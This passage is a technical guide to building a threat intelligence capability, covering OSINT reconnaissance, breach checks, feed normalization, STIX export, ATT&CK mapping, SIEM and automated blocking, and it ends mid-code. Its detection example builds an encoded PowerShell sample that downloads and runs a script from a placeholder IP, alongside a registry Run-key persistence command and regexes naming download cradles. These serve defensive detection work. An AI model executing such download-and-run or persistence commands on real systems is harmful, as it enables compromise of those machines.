Introduction
Threat intelligence turns security from a reactive into a proactive discipline: instead of waiting for an alert to fire, you collect, validate and operationalize knowledge about adversaries, their infrastructure and their tradecraft, so that detections and controls are in place before an intrusion reaches you. Industry surveys credit mature programs with substantially faster detection and lower breach costs (figures such as 65% faster detection and 50% lower breach cost are commonly quoted; treat them as results of particular surveys, not guarantees). This guide covers building a threat intelligence capability from scratch.
Key Statistics (widely cited industry-report figures; they move from year to year and depend on each report's sample, so check the current edition before quoting them):
- 68% of breaches involve external actors
- Average time from compromise to detection (dwell time): 197 days
- Threat intelligence reduces false positives by 45%
- 80% of successful attacks exploit known vulnerabilities, that is, ones for which a patch or mitigation was already available
Threat Intelligence Lifecycle
┌─────────────────────────────────────────────────────────────────┐
│                  Threat Intelligence Lifecycle                  │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌─────────┐    ┌─────────┐    ┌─────────┐    ┌─────────┐       │
│  │  Plan   │───▶│ Collect │───▶│ Process │───▶│ Analyze │       │
│  └─────────┘    └─────────┘    └─────────┘    └─────────┘       │
│       ▲                                            │            │
│       │ feedback                                   ▼            │
│       │         ┌─────────┐    ┌─────────┐         │            │
│       └─────────│  Share  │◀───│ Dissem  │◀────────┘            │
│                 └─────────┘    └─────────┘                      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
OSINT Techniques
Domain Reconnaissance
#!/usr/bin/env python3
"""OSINT domain reconnaissance.

Requires: pip install python-whois dnspython requests

The WHOIS and DNS lookups are passive (they go to registries and resolvers).
The technology check fetches the target's web site directly and shows up in
its logs, so skip it when the engagement calls for passive-only collection.
"""
import json
import re
import sys
from datetime import datetime

import dns.exception
import dns.resolver
import requests
import whois

# Header/body fingerprints are heuristics; confirm them by hand before acting on them.
TECH_FINGERPRINTS = {
    'WordPress': re.compile(r'/wp-(?:content|includes)/', re.I),
    'React': re.compile(r'data-reactroot|react(?:-dom)?(?:\.production)?(?:\.min)?\.js', re.I),
    'Vue.js': re.compile(r'vue(?:\.runtime)?(?:\.min)?\.js|data-v-[0-9a-f]{8}', re.I),
}


def lookup_whois(domain):
    """Registrar, dates, name servers and registrant (registrant fields are often redacted)."""
    w = whois.whois(domain)
    return {
        'registrar': w.registrar,
        'creation_date': str(w.creation_date),
        'expiration_date': str(w.expiration_date),
        'name_servers': w.name_servers,
        'registrant': {'name': w.name, 'country': w.country},
    }


def lookup_dns(domain):
    """Real record queries via dnspython; socket.gethostbyname() cannot return MX/NS/TXT records."""
    records = {}
    for rtype in ('A', 'AAAA', 'MX', 'NS', 'TXT'):
        try:
            answers = dns.resolver.resolve(domain, rtype)
            records[rtype.lower()] = [r.to_text() for r in answers]
        except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN,
                dns.resolver.NoNameservers, dns.exception.Timeout):
            pass
    return records


def detect_technologies(domain):
    """Active check: one GET against the site, then header and body fingerprints."""
    response = requests.get(f'https://{domain}', timeout=10,
                            headers={'User-Agent': 'Mozilla/5.0 (OSINT research)'})
    found = []
    for header in ('Server', 'X-Powered-By', 'X-Generator'):
        if header in response.headers:
            found.append(f'{header}: {response.headers[header]}')
    for name, pattern in TECH_FINGERPRINTS.items():
        if pattern.search(response.text):
            found.append(name)
    return found


def analyze_domain(domain):
    """Comprehensive domain analysis; each stage records its own error instead of aborting the run."""
    results = {
        'domain': domain,
        'timestamp': datetime.now().isoformat(),
        'whois': {},
        'dns': {},
        'web_technologies': [],
        'subdomains': [],   # filled from the enumeration tools in the next section
    }
    try:
        results['whois'] = lookup_whois(domain)
    except Exception as e:
        results['whois'] = {'error': str(e)}
    results['dns'] = lookup_dns(domain)
    try:
        results['web_technologies'] = detect_technologies(domain)
    except requests.RequestException as e:
        results['web_technologies'] = [f'Error: {e}']
    return results


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else 'example.com'
    print(json.dumps(analyze_domain(target), indent=2))
Subdomain Enumeration
# amass, passive sources only (no DNS brute force, nothing touches the target)
amass enum -passive -d example.com -o amass.txt
# assetfinder: certificate transparency, search engines and similar sources
assetfinder --subs-only example.com > assetfinder.txt
# findomain: -u writes all results for the target to one file
findomain -t example.com -u findomain.txt
# Merge into one list; write each tool to its own file first, otherwise each
# command overwrites the previous tool's output. The three overlap heavily.
cat amass.txt assetfinder.txt findomain.txt | tr 'A-Z' 'a-z' | sort -u > combined_subdomains.txt
# Keep only names that still resolve (dnsx from projectdiscovery), so later
# stages do not chase stale certificate-transparency entries
dnsx -silent -l combined_subdomains.txt -o live_subdomains.txt
Breach Data Search
#!/usr/bin/env python3
"""Check for compromised credentials via Have I Been Pwned (HIBP).

The breachedaccount endpoint requires an API key (sent in the hibp-api-key
header) and returns 401 without one. The Pwned Passwords range endpoint is
free and needs no key. Both want a descriptive User-Agent.
"""
import hashlib
import os
from urllib.parse import quote

import requests

HIBP_API_KEY = os.environ.get('HIBP_API_KEY', '')
USER_AGENT = 'ThreatIntelTool/1.0'


def check_breach(email):
    """Check if an email address appears in known breaches."""
    url = f"https://haveibeenpwned.com/api/v3/breachedaccount/{quote(email)}"
    headers = {'User-Agent': USER_AGENT, 'hibp-api-key': HIBP_API_KEY}
    try:
        response = requests.get(url, headers=headers, timeout=10)
    except requests.RequestException as e:
        return {'email': email, 'error': str(e)}
    if response.status_code == 200:
        breaches = response.json()   # truncated by default: only the breach names
        return {
            'email': email,
            'breached': True,
            'breach_count': len(breaches),
            'breaches': [b['Name'] for b in breaches],
        }
    if response.status_code == 404:
        return {'email': email, 'breached': False}
    if response.status_code == 429:
        return {'email': email,
                'error': f"rate limited, retry after {response.headers.get('Retry-After')}s"}
    return {'email': email, 'error': f'Status {response.status_code}'}


def check_password_compromised(password):
    """Check a password against Pwned Passwords with the k-anonymity range API.

    Only the first 5 hex characters of the SHA-1 hash leave the machine; the
    service returns every suffix in that range and the match is done locally.
    """
    sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    # Add-Padding makes every range response a similar size, so the response
    # length cannot be used to infer which prefix was queried.
    response = requests.get(url, headers={'User-Agent': USER_AGENT, 'Add-Padding': 'true'},
                            timeout=10)
    response.raise_for_status()
    for line in response.text.splitlines():
        hash_suffix, _, count = line.partition(':')
        # padded entries carry a count of 0 and are not real matches
        if hash_suffix.upper() == suffix and int(count) > 0:
            return {'compromised': True, 'count': int(count)}
    return {'compromised': False}


if __name__ == '__main__':
    import json
    print(json.dumps(check_breach('test@example.com'), indent=2))
    print(json.dumps(check_password_compromised('password'), indent=2))
Threat Feeds Integration
Open Source Feeds
# Threat Intelligence Platform Configuration (illustrative schema; adapt to your ingestion tooling)
threat_intel:
  sources:
    # AlienVault OTX (pulse subscriptions; key from https://otx.alienvault.com)
    otx:
      enabled: true
      api_key: ${OTX_API_KEY}
      pulse_types:
        - malware
        - vulnerability
        - threat
    # abuse.ch feeds (free; check each project's terms of use and current
    # authentication requirements before automating downloads)
    abusech:
      enabled: true
      feeds:
        - url: "https://urlhaus.abuse.ch/downloads/json/"
          type: malware_urls
        - url: "https://feodotracker.abuse.ch/downloads/ipblocklist.json"
          type: c2_indicators
        - url: "https://threatfox.abuse.ch/export/json/recent/"
          type: ioc_mixed
    # Spamhaus DROP (hijacked/leased netblocks): an IP blocklist, not an abuse.ch feed
    spamhaus:
      enabled: true
      feeds:
        - url: "https://www.spamhaus.org/drop/drop.txt"
          type: cidr_blocklist
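The "Process" stage of the lifecycle is where raw feed entries become indicators a SIEM can use, and the feeds above do not agree on field names, timestamps or what "active" means. The block below is an added example (mine, not part of the original page and not abuse.ch tooling) that normalizes entries from two differently shaped feeds into one record layout, assigns a confidence that decays with age so a C2 IP listed a year ago does not carry the same weight as one seen yesterday, and collapses duplicates across entries. The sample entries are constructed; their field names mirror the Feodo Tracker ipblocklist.json and URLhaus JSON exports as I know them, so verify them against a fresh download before wiring this to a live feed. The half-life and base confidences are my own choices.

```python
#!/usr/bin/env python3
"""Normalize entries from two differently shaped feeds into one indicator record.

Added example, not from the original page or from abuse.ch. Sample entries are
constructed; their field names mirror the Feodo Tracker ipblocklist.json and
URLhaus json exports as I know them, so check them against a fresh download.
"""
from dataclasses import dataclass, asdict
from datetime import datetime, timezone

REFERENCE_TIME = datetime(2024, 3, 6, tzinfo=timezone.utc)   # fixed "now" so results are reproducible

# Constructed Feodo Tracker entries: one C2 IP listed twice (two ports) plus an old, offline one
FEODO_SAMPLE = [
    {"ip_address": "203.0.113.10", "port": 443, "status": "online", "malware": "Dridex",
     "first_seen": "2024-03-01 10:00:00", "last_online": "2024-03-05"},
    {"ip_address": "203.0.113.10", "port": 8443, "status": "offline", "malware": "Dridex",
     "first_seen": "2024-02-25 10:00:00", "last_online": "2024-02-28"},
    {"ip_address": "198.51.100.7", "port": 8080, "status": "offline", "malware": "Emotet",
     "first_seen": "2023-01-15 08:30:00", "last_online": "2023-02-01"},
]
# Constructed URLhaus entries: the export is a dict of id -> list of entries
URLHAUS_SAMPLE = {
    "1": [{"url": "http://203.0.113.10/loader.exe", "url_status": "online", "threat": "malware_download",
           "dateadded": "2024-03-04 09:12:00", "tags": ["exe", "Dridex"]}],
    "2": [{"url": "http://malware.example.net/x.php", "url_status": "offline", "threat": "malware_download",
           "dateadded": "2024-02-20 12:00:00", "tags": None}],
}
FILE_TYPE_TAGS = {"exe", "elf", "dll", "zip", "doc", "xls", "js"}   # tags that are not malware families


@dataclass
class Indicator:
    type: str           # ipv4 | url | domain
    value: str
    source: str
    malware: str
    first_seen: datetime
    active: bool
    confidence: int     # 0-100 after age decay


def decayed_confidence(base, first_seen, active, now, half_life_days=30):
    """Halve the confidence every half_life_days; an indicator the feed marks offline starts at half."""
    age_days = (now - first_seen).days
    start = base if active else base // 2
    return max(0, int(start * 0.5 ** (age_days / half_life_days)))


def parse_feed_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def normalize_feodo(entries, now):
    """Feodo Tracker: one C2 IP (plus port) per entry."""
    out = []
    for e in entries:
        seen = parse_feed_time(e["first_seen"])
        active = e["status"] == "online"
        out.append(Indicator("ipv4", e["ip_address"], "feodotracker", e["malware"],
                             seen, active, decayed_confidence(90, seen, active, now)))
    return out


def normalize_urlhaus(export, now):
    """URLhaus: the malware family, when known, is carried in the free-form tags."""
    out = []
    for entries in export.values():
        for e in entries:
            seen = parse_feed_time(e["dateadded"])
            active = e["url_status"] == "online"
            family = next((t for t in (e["tags"] or []) if t.lower() not in FILE_TYPE_TAGS), "unknown")
            out.append(Indicator("url", e["url"], "urlhaus", family,
                                 seen, active, decayed_confidence(80, seen, active, now)))
    return out


def merge(indicators):
    """Collapse duplicates of the same (type, value): keep the most confident record, remember every source."""
    merged = {}
    for ind in indicators:
        key = (ind.type, ind.value)
        kept = merged.get(key)
        if kept is None:
            merged[key] = ind
            continue
        best = ind if ind.confidence > kept.confidence else kept
        best.source = "+".join(sorted(set(kept.source.split("+")) | {ind.source}))
        merged[key] = best
    return sorted(merged.values(), key=lambda i: -i.confidence)


def build_indicator_set(now=REFERENCE_TIME):
    return merge(normalize_feodo(FEODO_SAMPLE, now) + normalize_urlhaus(URLHAUS_SAMPLE, now))


if __name__ == "__main__":
    for ind in build_indicator_set():
        print(asdict(ind))
```

With the constructed data the live Dridex C2 scores in the low 80s, the fresh URLhaus URL just under it, the stale offline Emotet IP decays to 0 and would be dropped by any sane blocking threshold; that ordering is the point of the decay, since a feed's raw "listed" bit says nothing about whether the infrastructure is still in use.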
MISP Integration
# MISP (Malware Information Sharing Platform); illustrative schema, adapt to your ingestion tooling
misp:
  url: "https://misp.example.com"
  api_key: ${MISP_API_KEY}
  # Auto-import attributes that carry these tags and are of these MISP attribute types
  auto_import:
    enabled: true
    tags:
      - "tlp:amber"     # may be acted on internally, must not be reshared outside the community it came from
      - "osint:verified"
    types:
      - domain
      - ip-src
      - ip-dst
      - url
      - md5
      - sha256
    filters:
      malware_category: "banker"
  # Export for SIEM
  export:
    format: "stix2"     # STIX 2.1 bundles, which current SIEM and TIP connectors ingest
    schedule: "hourly"
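The export step above hands indicators to the SIEM as STIX, and it is worth seeing what that actually has to look like, because a malformed pattern or a missing required field is rejected silently by many connectors. The block below is an added example (mine, not part of the original page and not MISP's exporter) that builds a STIX 2.1 bundle of Indicator objects from already-normalized IOCs using only the standard library, so it runs without the stix2 package. It escapes values for STIX pattern string literals, maps the page's TLP tags onto the marking-definition IDs the STIX 2.1 specification fixes for TLP, and derives each indicator's ID deterministically from its value so re-exports update objects instead of duplicating them. The IOC records are constructed; the field layout they use is my own.

```python
#!/usr/bin/env python3
"""Build a STIX 2.1 bundle of Indicator objects from normalized IOCs.

Added example, not from the original page or from MISP. Uses only the
standard library. The IOC records below are constructed.
"""
import json
import uuid
from datetime import datetime, timezone

REFERENCE_TIME = datetime(2024, 3, 6, tzinfo=timezone.utc)   # fixed timestamp for reproducible output

# STIX 2.1 pattern templates per IOC type (STIX Cyber Observable object paths)
PATTERNS = {
    "ipv4": "[ipv4-addr:value = '{v}']",
    "domain": "[domain-name:value = '{v}']",
    "url": "[url:value = '{v}']",
    "sha256": "[file:hashes.'SHA-256' = '{v}']",
}
# TLP marking-definition IDs are fixed by the STIX 2.1 specification
TLP_MARKINGS = {
    "tlp:white": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
    "tlp:green": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
    "tlp:amber": "marking-definition--f88d31f6-486f-44da-b317-01333bde0b82",
    "tlp:red": "marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed",
}


def stix_escape(value):
    """Backslash and single quote are the characters that need escaping inside a STIX string literal."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def stix_timestamp(dt):
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def make_indicator(ioc, now):
    """One STIX 2.1 Indicator SDO; the id is derived from the value so re-exports update, not duplicate."""
    if ioc["type"] not in PATTERNS:
        raise ValueError(f"unsupported IOC type {ioc['type']}")
    ts = stix_timestamp(now)
    obj = {
        "type": "indicator",
        "spec_version": "2.1",
        "id": "indicator--" + str(uuid.uuid5(uuid.NAMESPACE_URL, f"{ioc['type']}:{ioc['value']}")),
        "created": ts,
        "modified": ts,
        "name": f"{ioc['malware']} {ioc['type']}",
        "indicator_types": ["malicious-activity"],
        "pattern": PATTERNS[ioc["type"]].format(v=stix_escape(ioc["value"])),
        "pattern_type": "stix",
        "valid_from": ts,
        "confidence": ioc["confidence"],
        "labels": [f"source:{ioc['source']}", f"malware:{ioc['malware']}"],
    }
    if ioc.get("tlp") in TLP_MARKINGS:
        obj["object_marking_refs"] = [TLP_MARKINGS[ioc["tlp"]]]
    return obj


def build_bundle(iocs, now=REFERENCE_TIME):
    return {
        "type": "bundle",
        "id": "bundle--" + str(uuid.uuid4()),
        "objects": [make_indicator(i, now) for i in iocs],
    }


# Constructed IOCs in the shape a normalization step would hand over
SAMPLE_IOCS = [
    {"type": "ipv4", "value": "203.0.113.10", "malware": "Dridex", "source": "feodotracker",
     "confidence": 82, "tlp": "tlp:green"},
    {"type": "url", "value": "http://203.0.113.10/it's.exe", "malware": "Dridex", "source": "urlhaus",
     "confidence": 78, "tlp": "tlp:amber"},
    {"type": "sha256", "value": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
     "malware": "Emotet", "source": "misp", "confidence": 60},
]

if __name__ == "__main__":
    print(json.dumps(build_bundle(SAMPLE_IOCS), indent=2))
```

The second sample value contains an apostrophe on purpose: an exporter that interpolates values straight into the pattern produces `[url:value = 'http://.../it's.exe']`, which is not valid STIX patterning and is exactly the kind of entry that vanishes between the TIP and the SIEM without an error.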
MITRE ATT&CK Framework
Coverage Mapping
#!/usr/bin/env python3
"""Map security events to MITRE ATT&CK (Enterprise) techniques."""

MITRE_TACTICS = {
    'TA0001': 'Initial Access',
    'TA0002': 'Execution',
    'TA0003': 'Persistence',
    'TA0004': 'Privilege Escalation',
    'TA0005': 'Defense Evasion',
    'TA0006': 'Credential Access',
    'TA0007': 'Discovery',
    'TA0008': 'Lateral Movement',
    'TA0009': 'Collection',
    'TA0011': 'Command and Control',
    'TA0010': 'Exfiltration',
    'TA0040': 'Impact',
}

# Hand-maintained subset for illustration. For real coverage work load the full
# matrix from the ATT&CK STIX data (github.com/mitre-attack/attack-stix-data).
MITRE_TECHNIQUES = {
    'T1566': {
        'name': 'Phishing',
        'tactics': ['TA0001'],
        'detection': 'Mail gateway logs: suspicious attachments/links, lookalike sender domains',
        'mitigation': 'Email filtering, attachment sandboxing, user training',
    },
    'T1059': {
        'name': 'Command and Scripting Interpreter',
        'tactics': ['TA0002'],
        'detection': 'Process creation with full command line (PowerShell, cmd, WMI); script block logging',
        'mitigation': 'Application control, PowerShell Constrained Language Mode, restrict script execution',
    },
    'T1547': {
        'name': 'Boot or Logon Autostart Execution',
        'tactics': ['TA0003', 'TA0004'],
        'detection': 'Monitor Run/RunOnce keys, Startup folders and new services',
        'mitigation': 'Restrict write access to autostart locations and baseline them',
    },
    'T1082': {
        'name': 'System Information Discovery',
        'tactics': ['TA0007'],
        'detection': 'Command-line logging for systeminfo, hostname, ver',
        'mitigation': 'No practical preventive control; discovery is detected, not blocked',
    },
    'T1033': {
        'name': 'System Owner/User Discovery',
        'tactics': ['TA0007'],
        'detection': 'Command-line logging for whoami, query user',
        'mitigation': 'No practical preventive control; alert on chains of discovery commands',
    },
    'T1087': {
        'name': 'Account Discovery',
        'tactics': ['TA0007'],
        'detection': 'Command-line logging for net user, net group, dsquery',
        'mitigation': 'Restrict enumeration of privileged groups where the platform allows it',
    },
}


def map_to_mitre(event_data):
    """Map a security event to ATT&CK techniques.

    Substring matching on the command line is illustrative only; production
    detection content (Sigma rules, SIEM correlation searches) should carry
    the technique tags instead. Note that whoami is T1033, not T1087.
    """
    technique_mappings = {
        'powershell.exe -encodedcommand': 'T1059',
        'powershell.exe -enc': 'T1059',
        'reg add hkcu\\software\\microsoft\\windows\\currentversion\\run': 'T1547',
        'systeminfo': 'T1082',
        'whoami': 'T1033',
        'net user': 'T1087',
    }
    command = event_data.get('command', '').lower()
    detected_techniques = []
    seen = set()
    for pattern, technique_id in technique_mappings.items():
        if pattern in command and technique_id not in seen:
            seen.add(technique_id)
            technique = MITRE_TECHNIQUES.get(technique_id, {})
            detected_techniques.append({
                'technique_id': technique_id,
                'name': technique.get('name', 'Unknown'),
                'tactics': [MITRE_TACTICS.get(t, t) for t in technique.get('tactics', [])],
                'detection': technique.get('detection', 'N/A'),
                'mitigation': technique.get('mitigation', 'N/A'),
            })
    return detected_techniques


if __name__ == '__main__':
    import json
    print(json.dumps(map_to_mitre({'command': 'cmd.exe /c whoami && net user && systeminfo'}), indent=2))
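A substring mapper like the one above never looks inside `-EncodedCommand`, which is precisely where the interesting part of a PowerShell one-liner is hidden. The following is an added example (mine, not from the original page) that decodes the Base64/UTF-16LE payload Windows PowerShell expects, runs regex detections over both the outer command line and the decoded payload, and rolls the hits up into per-tactic coverage across a batch of events, which is what a "coverage mapping" exercise ultimately needs. The events are constructed; the technique IDs are real ATT&CK Enterprise IDs, the regexes and tactic subset are my own and deliberately narrow.

```python
#!/usr/bin/env python3
"""Decode -EncodedCommand payloads and map process events to ATT&CK.

Added example, not from the original page. Events are constructed; technique
IDs are real ATT&CK Enterprise IDs, the detection regexes are mine.
"""
import base64
import binascii
import re
from collections import defaultdict

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common short forms are covered here
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (technique id, technique name, tactic id, regex over the command line)
DETECTIONS = [
    ("T1059.001", "Command and Scripting Interpreter: PowerShell", "TA0002",
     re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)),
    ("T1027", "Obfuscated Files or Information", "TA0005", ENCODED_RE),
    ("T1033", "System Owner/User Discovery", "TA0007", re.compile(r"\bwhoami\b", re.I)),
    ("T1087.001", "Account Discovery: Local Account", "TA0007",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\b(?!\s+/domain)", re.I)),
    ("T1082", "System Information Discovery", "TA0007", re.compile(r"\bsysteminfo\b|\bhostname\b", re.I)),
    ("T1547.001", "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "TA0003",
     re.compile(r"currentversion\\run", re.I)),
    ("T1105", "Ingress Tool Transfer", "TA0011",
     re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|certutil.*-urlcache", re.I)),
]
TACTICS = {"TA0002": "Execution", "TA0003": "Persistence", "TA0005": "Defense Evasion",
           "TA0007": "Discovery", "TA0011": "Command and Control"}


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None if absent/invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def map_event(event):
    """Run every detection over the outer command line and over the decoded payload."""
    command = event["command"]
    decoded = decode_encoded_command(command)
    surfaces = [command] + ([decoded] if decoded else [])
    hits = [{"technique_id": tech_id, "name": name, "tactic": TACTICS[tactic]}
            for tech_id, name, tactic, pattern in DETECTIONS
            if any(pattern.search(s) for s in surfaces)]
    return {"host": event["host"], "decoded_command": decoded, "techniques": hits}


def tactic_coverage(events):
    """Which tactics fired, and on which hosts: a rough view of how far an intrusion has progressed."""
    coverage = defaultdict(set)
    for ev in events:
        for hit in map_event(ev)["techniques"]:
            coverage[hit["tactic"]].add(ev["host"])
    return {t: sorted(h) for t, h in coverage.items()}


def encode_for_powershell(script):
    """Used only to build the constructed sample the way attacker tooling would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (Sysmon event 1 / Windows 4688 style)
SAMPLE_EVENTS = [
    {"host": "WS01", "command": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(
        "whoami; net user; IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')")},
    {"host": "WS02", "command": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
                                "/v upd /t REG_SZ /d C:\\Users\\Public\\u.exe"},
    {"host": "WS03", "command": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(map_event(ev))
    print(tactic_coverage(SAMPLE_EVENTS))
```

For WS01 the outer command line yields only Execution and Defense Evasion; the Discovery and Command and Control hits come entirely from the decoded payload, which is why decoding belongs in the enrichment pipeline and not in the analyst's head.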
SIEM Integration
Splunk Threat Intelligence
# Splunk threat intelligence configuration (illustrative schema; Enterprise
# Security ships its own threat-intel framework in the SA-ThreatIntelligence app)
threat_intel:
  # Local threat intelligence lookups (the CSV/KV store lookups the searches below reference)
  local_intel:
    path: "/opt/splunk/etc/apps/SA-ThreatIntelligence/lookups"
  # IOC fields to look up
  ioc_fields:
    - src_ip
    - dest_ip
    - domain
    - file_hash
    - url
  # Automatic correlation searches
  correlations:
    - name: "Malware C2 Communication"
      # OUTPUT into a new field: writing the lookup result into 'action' would clobber the proxy verdict
      search: 'sourcetype=proxy action=allow | lookup mal_ip_list ip AS dest_ip OUTPUT category AS threat_category | where isnotnull(threat_category)'
      alert:
        threshold: 1
        action: notable
    - name: "Phishing Domain Access"
      search: 'sourcetype=proxy url=* | lookup phishing_domains domain OUTPUT verdict | where isnotnull(verdict)'
      alert:
        threshold: 1
        action: email
  # Threat Intelligence Dashboard
  dashboards:
    - name: "Threat Intelligence Overview"
      panels:
        - "Top 10 Attacker IPs"
        - "Malware Family Distribution"
        - "Attack Timeline"
        - "Coverage by MITRE Tactic"
QRadar Integration
#!/usr/bin/env python3
"""QRadar threat intelligence enrichment.

Offense data comes from the QRadar REST API (GET /api/siem/offenses/{id});
the feed lookup is a local in-memory index here so the scoring logic runs
without network access.
"""
# Local index built from the feeds configured earlier: (ioc_type, value) -> metadata
THREAT_INDEX = {
    ('ip', '203.0.113.10'): {'source': 'feodotracker', 'malware': 'Dridex', 'confidence': 82},
    ('domain', 'malware.example.net'): {'source': 'urlhaus', 'malware': 'unknown', 'confidence': 40},
}


def query_threat_feeds(ioc_type, ioc_value):
    """Return feed metadata for an indicator, or None when nothing is known."""
    key_type = 'ip' if ioc_type.endswith('_ip') else ioc_type   # direction does not matter for the lookup
    return THREAT_INDEX.get((key_type, ioc_value))


def calculate_threat_score(threat_intel):
    """Highest single confidence, nudged upward when several indicators of one offense match."""
    if not threat_intel:
        return 0
    scores = [hit['confidence'] for hit in threat_intel.values()]
    return min(100, max(scores) + 5 * (len(scores) - 1))


def process_offense(qradar_event):
    """Enrich a QRadar offense with threat intelligence and score it."""
    offense = qradar_event['offense']
    indicators = {
        'source_ip': offense.get('source_ip'),
        'destination_ip': offense.get('destination_ip'),
        'username': offense.get('username'),
        'domain': offense.get('domain'),
    }
    threat_intel = {}
    for ioc_type, ioc_value in indicators.items():
        if ioc_value:
            result = query_threat_feeds(ioc_type, ioc_value)
            if result:
                threat_intel[ioc_value] = result
    threat_score = calculate_threat_score(threat_intel)
    recommendations = []
    if threat_score > 70:
        recommendations.append("Immediate investigation required")
        recommendations.append("Block identified IPs/domains after allowlist review")
    elif threat_score > 30:
        recommendations.append("Low-confidence match: review within SLA, do not auto-block")
    return {
        'offense_id': offense['id'],
        'threat_score': threat_score,
        'threat_intel': threat_intel,
        'recommendations': recommendations,
    }


if __name__ == '__main__':
    import json
    sample = {'offense': {'id': 1234, 'source_ip': '203.0.113.10',
                          'destination_ip': '10.0.0.5', 'username': 'jdoe', 'domain': None}}
    print(json.dumps(process_offense(sample), indent=2))
Incident Response Integration
Automated IOC Enrichment
# Automated incident response with threat intelligence (illustrative schema, not a specific SOAR product's)
incident_response:
  automation:
    - name: "IOC Enrichment"
      trigger:
        severity: high
      actions:
        - lookup_ioc:
            indicators:
              - source_ip
              - dest_ip
              - file_hash
        - update_incident:
            fields:
              threat_actors: "${enriched.threat_actors}"
              malware_families: "${enriched.malware_families}"
              attack_techniques: "${enriched.mitre_techniques}"
    - name: "Auto-Block Malicious IPs"
      # Blocking on feed data alone takes down legitimate traffic as soon as a
      # feed lists a CDN, cloud or shared-hosting address. Gate the action on
      # confidence, indicator age and an allowlist, and keep every block time-limited.
      trigger:
        condition: "threat_confidence > 90 and indicator_age_days < 30"
      guards:
        never_block:
          - internal_ranges
          - cdn_and_cloud_allowlist
      actions:
        - block_ip:
            target: "firewall"
            duration: "24h"
        - update_blocklist:
            source: "threat_intel"
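The auto-block playbook is the one place in this pipeline where a bad indicator causes an outage rather than a false alert, so the decision deserves more than a single confidence comparison. The block below is an added example (mine, not from the original page or from any SOAR product) of the safety gate I would put in front of `block_ip`: it refuses internal and non-routable addresses and anything on an allowlist, requires the confidence threshold, rejects stale indicators, insists that at least two independent sources agree, and caps how many blocks one run may issue so a poisoned or malformed feed cannot flood the firewall. The allowlist netblock standing in for a CDN range, the indicator records and the two-source rule are all my own constructions.

```python
#!/usr/bin/env python3
"""Safety gate for automated IP blocking from threat-feed hits.

Added example, not from the original page or any SOAR product. The allowlist
ranges and indicator records below are constructed for the example.
"""
import ipaddress
from datetime import datetime, timedelta, timezone

# Ranges that must never be auto-blocked: RFC 1918, loopback and link-local, plus a
# constructed allowlist entry standing in for CDN, cloud and partner netblocks.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "198.51.100.0/24",   # constructed: pretend this is a CDN edge range
)]
MAX_BLOCKS_PER_RUN = 50          # a runaway feed must not flood the firewall
CONFIDENCE_THRESHOLD = 90        # matches the playbook's "threat_confidence > 90"
MAX_INDICATOR_AGE = timedelta(days=30)
MIN_SOURCES = 2                  # my choice: one feed alone is not enough to block on


def block_decision(indicator, now):
    """Return (should_block, reason) for one indicator: dict with ip, confidence, first_seen, sources."""
    try:
        ip = ipaddress.ip_address(indicator["ip"])
    except ValueError:
        return False, "not an IP address"
    if any(ip in net for net in NEVER_BLOCK) or ip.is_multicast or ip.is_unspecified:
        return False, "allowlisted or non-routable"
    if indicator["confidence"] <= CONFIDENCE_THRESHOLD:
        return False, f"confidence {indicator['confidence']} below threshold"
    if now - indicator["first_seen"] > MAX_INDICATOR_AGE:
        return False, "indicator stale"
    if len(set(indicator.get("sources", []))) < MIN_SOURCES:
        return False, "single-source indicator; needs corroboration"
    return True, "block"


def plan_blocks(indicators, now):
    """Apply the gate to a batch and cap the number of blocks issued in one run."""
    decisions = [(i["ip"], *block_decision(i, now)) for i in indicators]
    to_block = [ip for ip, ok, _ in decisions if ok][:MAX_BLOCKS_PER_RUN]
    skipped = {ip: reason for ip, ok, reason in decisions if not ok}
    return {"block": to_block, "skipped": skipped}


REFERENCE_TIME = datetime(2024, 3, 6, tzinfo=timezone.utc)
# Constructed feed hits, one per failure mode the gate is meant to catch
SAMPLE_INDICATORS = [
    {"ip": "203.0.113.10", "confidence": 95, "first_seen": REFERENCE_TIME - timedelta(days=3),
     "sources": ["feodotracker", "threatfox"]},                                    # should block
    {"ip": "198.51.100.7", "confidence": 99, "first_seen": REFERENCE_TIME - timedelta(days=1),
     "sources": ["feodotracker", "otx"]},                                          # in the CDN allowlist
    {"ip": "10.20.30.40", "confidence": 99, "first_seen": REFERENCE_TIME,
     "sources": ["otx", "misp"]},                                                  # internal address
    {"ip": "203.0.113.77", "confidence": 95, "first_seen": REFERENCE_TIME - timedelta(days=90),
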